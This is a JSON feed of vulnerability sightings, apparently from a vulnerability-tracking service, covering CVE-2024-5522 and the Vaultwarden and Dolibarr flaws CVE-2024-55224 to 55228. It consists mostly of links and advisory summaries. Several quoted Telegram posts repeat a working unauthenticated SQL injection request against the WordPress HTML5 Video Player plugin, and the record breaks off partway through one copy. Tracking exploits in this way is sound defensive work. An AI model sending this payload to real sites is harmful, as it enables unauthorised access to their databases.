{"vulnerability": "CVE-2024-5522", "sightings": [{"uuid": "1a598f11-718b-4a59-b209-d8d0719577da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55225", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113800468036602122", "content": "", "creation_timestamp": "2025-01-09T21:15:37.451910Z"}, {"uuid": "d740ec8f-d5e6-49ad-82f3-b4a9586aa28d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55226", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113800468050519291", "content": "", "creation_timestamp": "2025-01-09T21:15:37.819639Z"}, {"uuid": "c5afe198-243f-4c73-b49c-c17f0a5b64f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55224", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113800468021961439", "content": "", "creation_timestamp": "2025-01-09T21:15:37.990136Z"}, {"uuid": "7fca5857-592e-4b56-a359-5e70e49891e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55225", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfdlznw6wy2f", "content": "", "creation_timestamp": "2025-01-09T21:16:53.216293Z"}, {"uuid": "1b2d4fc6-403a-4d16-ac27-daf4d6fb56b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55226", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfdlzqb5m72m", "content": "", "creation_timestamp": "2025-01-09T21:16:55.641975Z"}, {"uuid": "c94a1b2b-0c6f-4d4e-aa38-c218f170af53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55224", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfdlzljs4y25", "content": "", "creation_timestamp": "2025-01-09T21:16:50.657310Z"}, {"uuid": "7405a820-4ab0-4888-85c5-6d522a877680", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55224", "type": "seen", "source": "https://mastodon.social/users/CyberSignaler/statuses/113805551061422878", "content": "", "creation_timestamp": "2025-01-10T18:48:18.925293Z"}, {"uuid": "26d08d32-d94b-40bd-8574-c6ed6b902678", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55225", "type": "seen", "source": "https://mastodon.social/users/CyberSignaler/statuses/113805551131288767", "content": "", "creation_timestamp": "2025-01-10T18:48:20.442515Z"}, {"uuid": "6400739f-b04c-4c36-b508-67b03292aec1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55228", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lgqmj4sq5b2e", "content": "", "creation_timestamp": "2025-01-27T18:55:20.287729Z"}, {"uuid": "09b30992-52f3-40f4-bd05-98a8e09fa399", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55227", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lgqmj5wvuv2q", "content": "", "creation_timestamp": "2025-01-27T18:55:24.605893Z"}, {"uuid": "32c1b9f1-2ada-42ae-b37c-9899d923ef70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8654", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aA PoC exploit scanner for CVE-2024-5522 vulnerability in WordPress websites\nURL\uff1ahttps://github.com/geniuszlyy/CVE-2024-5522\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-01T16:06:01.000000Z"}, {"uuid": "616bfd75-459b-4386-877f-975710e4e1d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55227", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lgqgxluvrn2f", "content": "", "creation_timestamp": "2025-01-27T17:16:03.470891Z"}, {"uuid": "6589f66a-f0e7-4d77-b6f5-7e09d5ed27e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55228", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lgqgxoi3yq2j", "content": "", "creation_timestamp": "2025-01-27T17:16:06.176859Z"}, {"uuid": "d70ee5ba-5107-40a5-853b-62116c78e629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55225", "type": "seen", "source": "MISP/3445a876-cced-4346-bf37-e276ba39cff4", "content": "", "creation_timestamp": "2025-09-02T18:30:14.000000Z"}, {"uuid": "afcd888f-f0b7-416c-8bdd-5af3a3bba7f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55227", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113901292421021624", "content": "", "creation_timestamp": "2025-01-27T16:36:35.538554Z"}, {"uuid": "94a296a9-38fd-4d8b-b7a3-3a0d83a09b39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55228", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113901292435622561", "content": "", "creation_timestamp": "2025-01-27T16:36:35.832985Z"}, {"uuid": "4484160d-3cd7-43b1-af09-c6717656930d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55227", "type": "exploited", "source": "https://gist.github.com/Dqtdqt/9762466cd6ec541ea265ba33b09489ff", "content": "", "creation_timestamp": "2025-01-25T03:51:47.000000Z"}, {"uuid": "d1b9c727-746d-4b8a-a842-5220ca05e136", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55228", "type": "exploited", "source": "https://gist.github.com/Dqtdqt/a942bbce9a5fc851dce366902411c768", "content": "", "creation_timestamp": "2025-01-25T04:09:52.000000Z"}, {"uuid": "181f41bd-71af-4a0c-83ce-e0539283360c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55228", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3177", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-x2j8-vjg7-386r\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: A cross-site scripting (XSS) vulnerability in the Product module of Dolibarr v21.0.0-beta allows attackers to execute arbitrary web scripts or HTMl via a crafted payload injected into the Title parameter.\n\ud83d\udccf Published: 2025-01-27T18:32:01Z\n\ud83d\udccf Modified: 2025-01-27T20:50:36Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-55228\n2. https://github.com/Dolibarr/dolibarr/commit/56710ce9b79a97df093f586c90bdaf6cce6a5808\n3. https://github.com/Dolibarr/dolibarr/commit/9aa24d9d9aeab36358c725dae3fe20c9631082e7\n4. https://github.com/Dolibarr/dolibarr/commit/c0250e4c9106b5c889e512a4771f0205d4f99b99\n5. https://gist.github.com/Dqtdqt/a942bbce9a5fc851dce366902411c768\n6. https://github.com/Dolibarr/dolibarr\n7. https://github.com/Dolibarr/dolibarr/security/policy", "creation_timestamp": "2025-01-27T21:08:24.000000Z"}, {"uuid": "5ea9556b-4d74-4151-9d4e-3320981f17d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55225", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1202", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55225\n\ud83d\udd39 Description: An issue in the component src/api/identity.rs of Vaultwarden prior to v1.32.5 allows attackers to impersonate users, including Administrators, via a crafted authorization request.\n\ud83d\udccf Published: 2025-01-09T00:00:00\n\ud83d\udccf Modified: 2025-01-10T17:25:40.893Z\n\ud83d\udd17 References:\n1. https://insinuator.net/2024/11/vulnerability-disclosure-authentication-bypass-in-vaultwarden-versions-1-32-5/\n2. https://github.com/dani-garcia/vaultwarden/releases/tag/1.32.5\n3. https://github.com/dani-garcia/vaultwarden/releases/tag/1.32.4", "creation_timestamp": "2025-01-10T18:04:00.000000Z"}, {"uuid": "9d80abf9-f454-4ba9-af15-b788d137542a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55224", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1200", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55224\n\ud83d\udd39 Description: An HTML injection vulnerability in Vaultwarden prior to v1.32.5 allows attackers to execute arbitrary code via injecting a crafted payload into the username field of an e-mail message.\n\ud83d\udccf Published: 2025-01-09T00:00:00\n\ud83d\udccf Modified: 2025-01-10T17:27:58.980Z\n\ud83d\udd17 References:\n1. https://insinuator.net/2024/11/vulnerability-disclosure-authentication-bypass-in-vaultwarden-versions-1-32-5/\n2. https://github.com/dani-garcia/vaultwarden/releases/tag/1.32.5\n3. https://github.com/dani-garcia/vaultwarden/releases/tag/1.32.4", "creation_timestamp": "2025-01-10T18:03:56.000000Z"}, {"uuid": "1398c2cf-62ce-4951-8d81-244711b5f13d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55227", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3178", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-2v3r-gvq5-qqgh\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: A cross-site scripting (XSS) vulnerability in the Events/Agenda module of Dolibarr v21.0.0-beta allows attackers to execute arbitrary web scripts or HTMl via a crafted payload injected into the Title parameter.\n\ud83d\udccf Published: 2025-01-27T18:32:01Z\n\ud83d\udccf Modified: 2025-01-27T20:50:34Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-55227\n2. https://github.com/Dolibarr/dolibarr/commit/56710ce9b79a97df093f586c90bdaf6cce6a5808\n3. https://github.com/Dolibarr/dolibarr/commit/9aa24d9d9aeab36358c725dae3fe20c9631082e7\n4. https://github.com/Dolibarr/dolibarr/commit/c0250e4c9106b5c889e512a4771f0205d4f99b99\n5. https://gist.github.com/Dqtdqt/9762466cd6ec541ea265ba33b09489ff\n6. https://github.com/Dolibarr/dolibarr\n7. https://github.com/Dolibarr/dolibarr/security/policy", "creation_timestamp": "2025-01-27T21:08:25.000000Z"}, {"uuid": "ba485506-eb50-4432-bed1-445c87fe468f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "Telegram/BT4eANdD013slAJckBzZvR4kUdpI7QYHiNpshjwysC4P75k", "content": "", "creation_timestamp": "2024-07-09T15:18:16.000000Z"}, {"uuid": "e6ba7a06-35ba-4924-a396-dc9b22754786", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55225", "type": "seen", "source": "https://t.me/cvedetector/14922", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-55225 - Vaultwarden Authentication Bypass Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-55225 \nPublished : Jan. 9, 2025, 9:15 p.m. | 28\u00a0minutes ago \nDescription : An issue in the component src/api/identity.rs of Vaultwarden prior to v1.32.5 allows attackers to impersonate users, including Administrators, via a crafted authorization request. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-09T22:47:55.000000Z"}, {"uuid": "5690f597-315b-4fee-8c59-692bde081b67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55226", "type": "seen", "source": "https://t.me/cvedetector/14925", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-55226 - Vaultwarden Authenticated Reflected Cross-Site Scripting (XSS)\", \n  \"Content\": \"CVE ID : CVE-2024-55226 \nPublished : Jan. 9, 2025, 9:15 p.m. | 28\u00a0minutes ago \nDescription : Vaultwarden v1.32.5 was discovered to contain an authenticated reflected cross-site scripting (XSS) vulnerability via the component /api/core/mod.rs. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-09T22:47:58.000000Z"}, {"uuid": "2b4824f4-3b9e-4d36-aa6f-db2504df679e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55224", "type": "seen", "source": "https://t.me/cvedetector/14924", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-55224 - Vaultwarden HTML Injection\", \n  \"Content\": \"CVE ID : CVE-2024-55224 \nPublished : Jan. 9, 2025, 9:15 p.m. | 28\u00a0minutes ago \nDescription : An HTML injection vulnerability in Vaultwarden prior to v1.32.5 allows attackers to execute arbitrary code via injecting a crafted payload into the username field of an e-mail message. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-09T22:47:57.000000Z"}, {"uuid": "00b6c928-e5fb-4682-8d40-d78db074d9b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7474", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-5522 HTML5 Video Player &lt;= 2.5.26 - Unauthenticated SQL Injection\nURL\uff1ahttps://github.com/truonghuuphuc/CVE-2024-5522-Poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-31T06:58:31.000000Z"}, {"uuid": "386086ac-b9e7-4695-9bf5-5d28a80e7da4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "seen", "source": "https://t.me/ap_security/566", "content": "#pentest\n\n\ud83d\udce3 CVE-2024-5522 (CVSS 10)\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0434\u0435\u0444\u0435\u043a\u0442 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u0433\u0440\u043e\u0436\u0430\u0435\u0442 \u0442\u044b\u0441\u044f\u0447\u0430\u043c \u0441\u0430\u0439\u0442\u043e\u0432 WordPress\n\n\ud83d\udcf6\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c WordPress, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043b\u0438 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0439 \u043f\u043b\u0430\u0433\u0438\u043d HTML5 Video Player, \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u043d\u044f\u0442\u044c \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \n\n\ud83d\udcf6\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2024-5522, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 SQL \u0432 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u043e\u0432, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u044f \u0440\u0438\u0441\u043a\u0443 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u043b\u0438 \u0446\u0435\u043b\u043e\u0441\u0442\u043d\u043e\u0441\u0442\u044c \u0441\u0430\u0439\u0442\u0430.\n\n\u26a1\ufe0f\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u0431\u043e\u043b\u0435\u0435 30 000 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043e\u043a, \u044d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0440\u0438\u0441\u043a \u0434\u043b\u044f \u0431\u043e\u043b\u044c\u0448\u043e\u0433\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0430 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u043e\u0432 WordPress.\n      \n\u0415\u0441\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u0435 \u0438\u043b\u0438 \u0443\u0434\u0430\u043b\u0438\u0442\u0435 \u043f\u043b\u0430\u0433\u0438\u043d, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435.", "creation_timestamp": "2024-06-03T12:18:35.000000Z"}, {"uuid": "2d6a8d3c-4c70-44c1-961b-a8c3b2087648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55228", "type": "seen", "source": "https://t.me/cvedetector/16504", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-55228 - Dolibarr XSS Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-55228 \nPublished : Jan. 27, 2025, 5:15 p.m. | 1\u00a0hour, 22\u00a0minutes ago \nDescription : A cross-site scripting (XSS) vulnerability in the Product module of Dolibarr v21.0.0-beta allows attackers to execute arbitrary web scripts or HTMl via a crafted payload injected into the Title parameter. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"27 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-27T20:11:39.000000Z"}, {"uuid": "37e0c156-afae-435a-aa57-2e9720ddc710", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-55227", "type": "seen", "source": "https://t.me/cvedetector/16503", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-55227 - \"Dolibarr Events/Agenda XSS\"\", \n  \"Content\": \"CVE ID : CVE-2024-55227 \nPublished : Jan. 27, 2025, 5:15 p.m. | 1\u00a0hour, 22\u00a0minutes ago \nDescription : A cross-site scripting (XSS) vulnerability in the Events/Agenda module of Dolibarr v21.0.0-beta allows attackers to execute arbitrary web scripts or HTMl via a crafted payload injected into the Title parameter. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"27 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-27T20:11:39.000000Z"}, {"uuid": "647e3d47-a832-4baf-aba3-5ac94f7f763a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "Telegram/DWZh39CCJjwDMNLJQlg32-IJ6bVW7hVgQa93YAxg1LNw0Q", "content": "", "creation_timestamp": "2024-07-09T15:22:47.000000Z"}, {"uuid": "2e913915-4c84-4993-96f0-1b40598ec87e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/12137", "content": "WordPress HTML5 Video Player SQL CVE-2024-5522\n\nGET\u00a0 /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -\n\n#exploit\u00a0 #poc", "creation_timestamp": "2024-07-09T15:29:44.000000Z"}, {"uuid": "9854ab82-2c33-4af7-beb3-1833ad6c4c07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1204", "content": "WordPress HTML5 Video Player SQL CVE-2024-5522\n\nGET\u00a0 /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -\n\n#exploit\u00a0 #poc", "creation_timestamp": "2024-07-09T15:29:44.000000Z"}, {"uuid": "bd78e63b-42c1-4b35-ae5a-bc7980cc4b8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "https://t.me/HelangMerahGroupHMG/2395", "content": "https://github.com/kryptonproject/CVE-2024-5522-PoC\n\nCVE-2024-5522-PoC : HTML5 Video Player &lt; 2.5.27 - Unauthenticated SQLi", "creation_timestamp": "2024-09-11T10:28:50.000000Z"}, {"uuid": "a5a84931-e861-41dc-ae76-a458f5762565", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "https://t.me/RipperSecIO/112630", "content": "https://github.com/kryptonproject/CVE-2024-5522-PoC\n\nCVE-2024-5522-PoC : HTML5 Video Player &lt; 2.5.27 - Unauthenticated SQLi", "creation_timestamp": "2024-09-11T10:55:15.000000Z"}, {"uuid": "0103aca6-a459-4993-8c3a-5f95e2411b4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "Telegram/Sqh6EZwDjYUEyD0KmCOu1fnD96OmLihsBaDstzs9VRNuTEz_", "content": "", "creation_timestamp": "2024-09-11T10:55:07.000000Z"}, {"uuid": "48e04786-6ba9-4706-880e-0f8a1919e68c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "Telegram/Q6JYSzCk4fSxtiIEfbQo5uoXu9pq_6r9ZFHqnZnr27qFgNu8", "content": "", "creation_timestamp": "2024-09-11T10:28:46.000000Z"}, {"uuid": "0956f754-7a77-4e7c-a097-251e1b7d816a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2163", "content": "\u041f\u0440\u043e\u0441\u044b\u043f\u0430\u0435\u043c\u0441\u044f, \u0437\u0430\u0432\u0442\u0440\u0430\u043a\u0430\u0435\u043c\n*\nCVE-2024-5522 WordPress HTML5 Video Player SQLi\n*\nusage:\nGET  /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -", "creation_timestamp": "2024-07-13T07:16:33.000000Z"}, {"uuid": "130223e8-192c-456b-904b-aa12499fe95e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "exploited", "source": "https://t.me/CNArsenal/2768", "content": "WordPress HTML5 Video Player SQL CVE-2024-5522\n\nGET  /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -\n\n#exploit  #poc", "creation_timestamp": "2024-07-09T08:12:20.000000Z"}, {"uuid": "c1afe5ff-968d-45bf-9973-48e9a86da51b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/392", "content": "WordPress HTML5 Video Player SQL CVE-2024-5522\n\nGET  /wp-json/h5vp/v1/video/0?id='+union all select 